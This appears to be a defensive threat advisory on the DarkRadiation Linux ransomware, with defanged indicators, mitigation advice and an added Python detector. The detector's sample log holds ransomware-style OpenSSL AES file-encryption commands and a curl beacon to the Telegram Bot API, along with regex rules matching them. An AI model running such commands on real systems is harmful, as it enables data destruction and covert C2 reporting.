Security researchers have observed a new ransomware dubbed “DarkRadiation,” written as a Bash script, that targets Linux and Docker instances. For file encryption, the ransomware uses OpenSSL's AES algorithm to encrypt the files in a directory. The ransomware scripts also use the API of the messaging application Telegram for command and control (C2) communication, sending infection status to the threat actor. Let's see in detail how the new DarkRadiation ransomware attacks target Linux hosts and Docker containers.
Most components of the DarkRadiation ransomware primarily target Red Hat and CentOS Linux distributions. However, researchers also found a few scripts written to target Debian-based Linux distributions.
Attackers use various open-source hacking tools to spread the malware and infect victims' networks. These tools include reconnaissance tools, Bash scripts that assist lateral movement, known exploits for Red Hat and CentOS, binary injectors (the libprocesshider rootkit), and more. Cybersecurity researchers also disclosed that some of the scripts are still in development. The concerning fact is that most of the tools used here are barely detected by antivirus engines. The research also notes that the ransomware scripts are obfuscated with an open-source tool called “node-bash-obfuscate,” a Node.js CLI tool and library for obfuscating Bash scripts.
DarkRadiation ransomware uses OpenSSL's AES algorithm to encrypt the files on the victim machine. It encrypts either files with specific extensions or all files in the given directory.
Once the target is infected, attackers use the Telegram API to communicate with the worm and ransomware scripts. In other words, the malware scripts use the Telegram API to reach the attacker's C2 directly. However, it is not clearly known how the ransomware is initially delivered to the target.
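As an added example (not from the original post or the researchers' analysis), the following Python detector looks for the two behaviours described above in constructed execve-style audit lines: OpenSSL AES file encryption and a Telegram Bot API beacon, and flags their combination on one host. The log format, rule names, sample commands and the placeholder bot token are assumptions.

```python
import re
from dataclasses import dataclass

# Constructed sample lines in a simplified execve-audit style (not real logs);
# the Telegram bot token is a placeholder, not a real value.
SAMPLE_LOG = """\
ts=100 uid=0 comm=openssl cmd="openssl enc -aes-256-cbc -salt -in /srv/db/main.db -out /srv/db/main.db.enc -pass pass:KEY"
ts=101 uid=0 comm=openssl cmd="openssl enc -aes-256-cbc -salt -in /srv/db/users.db -out /srv/db/users.db.enc -pass pass:KEY"
ts=102 uid=0 comm=curl cmd="curl -s https://api.telegram.org/botTOKEN_PLACEHOLDER/sendMessage -d chat_id=1 -d text=done"
ts=103 uid=1000 comm=openssl cmd="openssl x509 -in cert.pem -noout -text"
ts=104 uid=1000 comm=curl cmd="curl -s https://example.test/health"
"""

LINE_RE = re.compile(r'ts=(\d+) uid=(\d+) comm=(\S+) cmd="(.*)"')

# Rule 1: OpenSSL symmetric encryption with an AES cipher, as the post describes.
# Rule 2: the Telegram Bot API used as a C2 channel.
RULES = {
    "openssl_aes_encrypt": re.compile(r"\bopenssl\s+enc\b.*\s-aes-\d+-\w+"),
    "telegram_bot_api": re.compile(r"api\.telegram\.org/bot"),
}


@dataclass
class Finding:
    ts: int
    uid: int
    rule: str
    cmd: str


def detect(log_text: str) -> list[Finding]:
    """Return one Finding per (line, rule) match; lines that do not parse are skipped."""
    out = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, uid, cmd = int(m[1]), int(m[2]), m[4]
        for name, rx in RULES.items():
            if rx.search(cmd):
                out.append(Finding(ts, uid, name, cmd))
    return out


def correlate(findings: list[Finding], window: int = 300, min_encrypts: int = 2) -> bool:
    """True when repeated AES encryption precedes a Telegram beacon within `window` seconds."""
    encs = [f.ts for f in findings if f.rule == "openssl_aes_encrypt"]
    for f in findings:
        if f.rule == "telegram_bot_api":
            recent = [t for t in encs if f.ts - window <= t <= f.ts]
            if len(recent) >= min_encrypts:
                return True
    return False
```

Legitimate `openssl x509` and ordinary `curl` traffic in the sample do not fire, so the correlated alert rests on the encrypt-then-beacon sequence rather than on either tool alone.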
Malware command and control server:
185[.]141[.]25[.]168
Hack tools directory:
hxxps[://]u2wgg22a111ssy[.]space
hxxps[://]www[.]0zr33n33fo[.]space
hxxp[://]vk-o2vox-n[.]pp[.]ua
hxxps[://]m0troppm[.]site
hxxps[://]apooow4[.]space
hxxps[://]ga345ss34u[.]space
Block all the IOCs on firewalls, web proxies, and EDR applications.
Isolate the suspected machine for further analysis.
Initiate the business continuity plan (BCP).
Restore the data with clean backups.
Avoid handling files or URL links in emails, chats, or shared folders from untrusted sources.
Provide phishing awareness training to your employees/contractors.
Keep anti-malware solutions at the endpoint and network level updated at all times.
Deploy Endpoint Detection & Response (EDR) tools to detect the latest malware and suspicious activities on endpoints.
Thanks for reading the threat post. Please share this post with system admins and the people who use Linux in their work, and make them aware of the DarkRadiation ransomware attacks.
Arun KL is a cybersecurity professional with 15+ years of experience in IT infrastructure, cloud security, vulnerability management, Penetration Testing, security operations, and incident response. He is adept at designing and implementing robust security solutions to safeguard systems and data. Arun holds multiple industry certifications including CCNA, CCNA Security, RHCE, CEH, and AWS Security.